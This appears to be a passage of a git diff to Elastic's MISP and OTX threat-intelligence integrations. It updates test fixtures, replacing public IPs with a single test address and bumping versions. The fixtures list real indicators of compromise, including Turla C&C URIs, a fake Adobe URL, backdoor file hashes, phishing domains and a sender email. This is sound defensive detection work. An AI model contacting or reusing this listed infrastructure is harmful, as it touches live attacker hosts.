Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"12394\",\"type\":\"domain\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"572b4ab3-1af0-4d91-9cd5-07a1c0a8ab16\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1462454963\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"whatsapp.com\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -747,7 +747,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046389619Z", + "ingested": "2021-12-09T13:49:05.849361200Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17299\",\"type\":\"url\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5a53976c-e7c8-480d-a68a-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515427692\",\"comment\":\"Fake adobe URL\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"http://get.adobe.com/stats/AbfFcBebD/?q=\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046395060Z", + "ingested": "2021-12-09T13:49:05.849366500Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17330\",\"type\":\"uri\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5a539ce1-3de0-4e34-8fc4-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515429089\",\"comment\":\"Win32 backdoor C\u0026C URI\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"/scripts/m/query.php?id=\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -897,7 +897,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046399799Z", + "ingested": "2021-12-09T13:49:05.849372600Z", "original": "{\"Event\":{\"id\":\"158\",\"orgc_id\":\"5\",\"org_id\":\"1\",\"date\":\"2018-01-08\",\"threat_level_id\":\"1\",\"info\":\"Turla: Mosquito Whitepaper\",\"published\":true,\"uuid\":\"5a5395d1-40a0-45fc-b692-334a0a016219\",\"attribute_count\":\"61\",\"analysis\":\"0\",\"timestamp\":\"1535462417\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637953\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"local\":false},\"Attribute\":{\"id\":\"17322\",\"type\":\"filename|sha1\",\"category\":\"Artifacts dropped\",\"to_ids\":false,\"uuid\":\"5a539ce1-e6a0-426a-942c-2fc50a016219\",\"event_id\":\"158\",\"distribution\":\"5\",\"timestamp\":\"1515429089\",\"comment\":\"JavaScript backdoor\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[{\"Event\":{\"id\":\"58\",\"date\":\"2018-08-17\",\"threat_level_id\":\"1\",\"info\":\"Turla Outlook White Paper\",\"published\":true,\"uuid\":\"5b773e07-e694-458b-b99c-27f30a016219\",\"analysis\":\"0\",\"timestamp\":\"1535462383\",\"distribution\":\"3\",\"org_id\":\"1\",\"orgc_id\":\"5\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\"},\"Orgc\":{\"id\":\"5\",\"name\":\"ESET\",\"uuid\":\"55f6ea5e-51ac-4344-bc8c-4170950d210f\"}}}],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"7\",\"name\":\"misp-galaxy:threat-actor=\\\"Turla Group\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"70\",\"name\":\"Turla\",\"colour\":\"#f20f53\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -972,7 +972,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046404297Z", + "ingested": "2021-12-09T13:49:05.849378Z", "original": "{\"Event\":{\"id\":\"22\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2015-12-08\",\"threat_level_id\":\"3\",\"info\":\"Packrat: Seven Years of a South American Threat Actor\",\"published\":true,\"uuid\":\"56ccdcaf-f7e4-40d8-bca1-51299062e56a\",\"attribute_count\":\"133\",\"analysis\":\"2\",\"timestamp\":\"1516723796\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637901\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"12268\",\"type\":\"email-src\",\"category\":\"Payload delivery\",\"to_ids\":true,\"uuid\":\"56ccdcb6-4d6c-4e48-b955-52849062e56a\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1456266422\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"claudiobonadio88@gmail.com\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -1045,7 +1045,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046408445Z", + "ingested": "2021-12-09T13:49:05.849383300Z", "original": "{\"Event\":{\"id\":\"22\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2015-12-08\",\"threat_level_id\":\"3\",\"info\":\"Packrat: Seven Years of a South American Threat Actor\",\"published\":true,\"uuid\":\"56ccdcaf-f7e4-40d8-bca1-51299062e56a\",\"attribute_count\":\"133\",\"analysis\":\"2\",\"timestamp\":\"1516723796\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637901\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"12298\",\"type\":\"regkey\",\"category\":\"Artifacts dropped\",\"to_ids\":true,\"uuid\":\"56ccdcd6-f4b8-4383-9624-52849062e56a\",\"event_id\":\"22\",\"distribution\":\"5\",\"timestamp\":\"1456266454\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -1109,7 +1109,7 @@ "type": "ipv4-addr", "provider": "misp", "port": 2222, - "ip": "62.38.114.12", + "ip": "89.160.20.156", "scanner_stats": 2 }, "feed": { @@ -1117,8 +1117,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046412382Z", - "original": "{\"Event\":{\"id\":\"10\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2020-12-09\",\"threat_level_id\":\"3\",\"info\":\"Recent Qakbot (Qbot) activity\",\"published\":true,\"uuid\":\"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16\",\"attribute_count\":\"15\",\"analysis\":\"2\",\"timestamp\":\"1607868196\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637888\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"10686\",\"type\":\"ip-dst|port\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"5fd0c620-a844-4ace-9710-a37bc0a8ab16\",\"event_id\":\"10\",\"distribution\":\"5\",\"timestamp\":\"1607517728\",\"comment\":\"On port 2222\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"62.38.114.12|2222\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"6\",\"name\":\"misp-galaxy:banker=\\\"Qakbot\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0}]}}", + "ingested": "2021-12-09T13:49:05.849388700Z", + "original": "{\"Event\":{\"id\":\"10\",\"orgc_id\":\"4\",\"org_id\":\"1\",\"date\":\"2020-12-09\",\"threat_level_id\":\"3\",\"info\":\"Recent Qakbot (Qbot) activity\",\"published\":true,\"uuid\":\"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16\",\"attribute_count\":\"15\",\"analysis\":\"2\",\"timestamp\":\"1607868196\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610637888\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"4\",\"name\":\"CUDESO\",\"uuid\":\"56c42374-fdb8-4544-a218-41ffc0a8ab16\",\"local\":false},\"Attribute\":{\"id\":\"10686\",\"type\":\"ip-dst|port\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"5fd0c620-a844-4ace-9710-a37bc0a8ab16\",\"event_id\":\"10\",\"distribution\":\"5\",\"timestamp\":\"1607517728\",\"comment\":\"On port 2222\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"89.160.20.156|2222\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"3\",\"name\":\"tlp:white\",\"colour\":\"#ffffff\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"6\",\"name\":\"misp-galaxy:banker=\\\"Qakbot\\\"\",\"colour\":\"#0088cc\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":true,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_misp/manifest.yml b/packages/ti_misp/manifest.yml index 6e724853b74..3472abcabf3 100644 --- a/packages/ti_misp/manifest.yml +++ b/packages/ti_misp/manifest.yml @@ -1,6 +1,6 @@ name: ti_misp title: MISP -version: 1.0.1 +version: 1.0.2 release: ga description: This Elastic integration collects events from MISP type: integration diff --git a/packages/ti_otx/changelog.yml b/packages/ti_otx/changelog.yml index fe202fe50a1..c97e966f2e8 100644 --- a/packages/ti_otx/changelog.yml +++ b/packages/ti_otx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.2" changes: - description: Bump minimum version diff --git a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log index 22ed47e12f4..7a78647e7f9 100644 --- a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log +++ b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log @@ -1,12 +1,12 @@ -{"indicator":"86.104.194.30","description":null,"title":null,"content":"","type":"IPv4","id":1588938} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1588938} {"indicator":"90421f8531f963d81cf54245b72cde80","description":"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65","title":"Win32:Hoblig-B","content":"","type":"FileHash-MD5","id":9751110} {"indicator":"ip.anysrc.net","description":null,"title":null,"content":"","type":"hostname","id":16782717} -{"indicator":"107.173.58.176","description":null,"title":null,"content":"","type":"IPv4","id":19901748} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":19901748} {"indicator":"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":31612067} {"indicator":"f8e58af3ffefd4037fef246e93a55dc8","description":"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09","title":null,"content":"","type":"FileHash-MD5","id":34413770} {"indicator":"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":111154034} {"indicator":"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":151858953} -{"indicator":"213.252.244.38","description":null,"title":null,"content":"","type":"IPv4","id":311294364} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":311294364} {"indicator":"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":406540408} {"indicator":"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":565556753} {"indicator":"aeb08b0651bc8a13dcf5e5f6c0d482f8","description":"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","title":null,"content":"","type":"FileHash-MD5","id":565556755} @@ -29,7 +29,7 @@ {"indicator":"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1566067095} {"indicator":"ff2dcea4963e060a658f4dffbb119529","description":"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1566999970} {"indicator":"0d73f1a1c4b2f8723fffc83eb3d00f31","description":"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1569290125} -{"indicator":"185.25.50.167","description":null,"title":null,"content":"","type":"IPv4","id":1592876453} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1592876453} {"indicator":"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1597058431} {"indicator":"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1603343478} {"indicator":"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","description":null,"title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA256","id":1606260302} @@ -43,8 +43,8 @@ {"indicator":"1581fe76e3c96dc33182daafd09c8cf5c17004e0","description":"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260353} {"indicator":"b72e75e9e901a44b655a5cf89cf0eadcaff46037","description":"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA1","id":1606260364} {"indicator":"maper.info","description":null,"title":null,"content":"","type":"domain","id":1634015726} -{"indicator":"213.252.244.126","description":null,"title":null,"content":"","type":"IPv4","id":1635374317} -{"indicator":"78.129.139.131","description":null,"title":null,"content":"","type":"IPv4","id":1756014820} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1635374317} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":1756014820} {"indicator":"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543412} {"indicator":"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543416} {"indicator":"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543440} @@ -52,20 +52,20 @@ {"indicator":"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543445} {"indicator":"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543456} {"indicator":"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543458} -{"indicator":"103.13.67.4","description":null,"title":null,"content":"","type":"IPv4","id":2114754074} -{"indicator":"80.90.87.201","description":null,"title":null,"content":"","type":"IPv4","id":2114754077} -{"indicator":"80.80.163.182","description":null,"title":null,"content":"","type":"IPv4","id":2114754078} -{"indicator":"91.187.114.210","description":null,"title":null,"content":"","type":"IPv4","id":2114754080} -{"indicator":"170.238.117.187","description":null,"title":null,"content":"","type":"IPv4","id":2117062744} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754074} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754077} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754078} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2114754080} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2117062744} {"indicator":"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":2117884668} -{"indicator":"103.84.238.3","description":null,"title":null,"content":"","type":"IPv4","id":2119746545} -{"indicator":"179.43.158.171","description":null,"title":null,"content":"","type":"IPv4","id":2129763785} -{"indicator":"198.211.116.199","description":null,"title":null,"content":"","type":"IPv4","id":2136050161} -{"indicator":"203.176.135.102","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2119746545} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2129763785} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2136050161} +{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568} {"indicator":"fotmailz.com","description":null,"title":null,"content":"","type":"domain","id":2137741373} {"indicator":"pori89g5jqo3v8.com","description":null,"title":null,"content":"","type":"domain","id":2137741468} {"indicator":"sebco.co.ke","description":null,"title":null,"content":"","type":"domain","id":2178708355} -{"indicator":"177.74.232.124","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102} +{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102} {"indicator":"chishir.com","description":null,"title":null,"content":"","type":"domain","id":2186034800} {"indicator":"kostunivo.com","description":null,"title":null,"content":"","type":"domain","id":2186034803} {"indicator":"mangoclone.com","description":null,"title":null,"content":"","type":"domain","id":2186034805} @@ -74,9 +74,9 @@ {"indicator":"24d4bbc982a6a561f0426a683b9617de1a96a74a","description":null,"title":"Sf:ShellCode-DZ\\ [Trj]","content":"","type":"FileHash-SHA1","id":2186034903} {"indicator":"fa98074dc18ad7e2d357b5d168c00a91256d87d1","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034912} {"indicator":"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034924} -{"indicator":"96.9.77.142","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445} -{"indicator":"36.89.106.69","description":null,"title":null,"content":"","type":"IPv4","id":2189036446} -{"indicator":"96.9.73.73","description":null,"title":null,"content":"","type":"IPv4","id":2190596263} 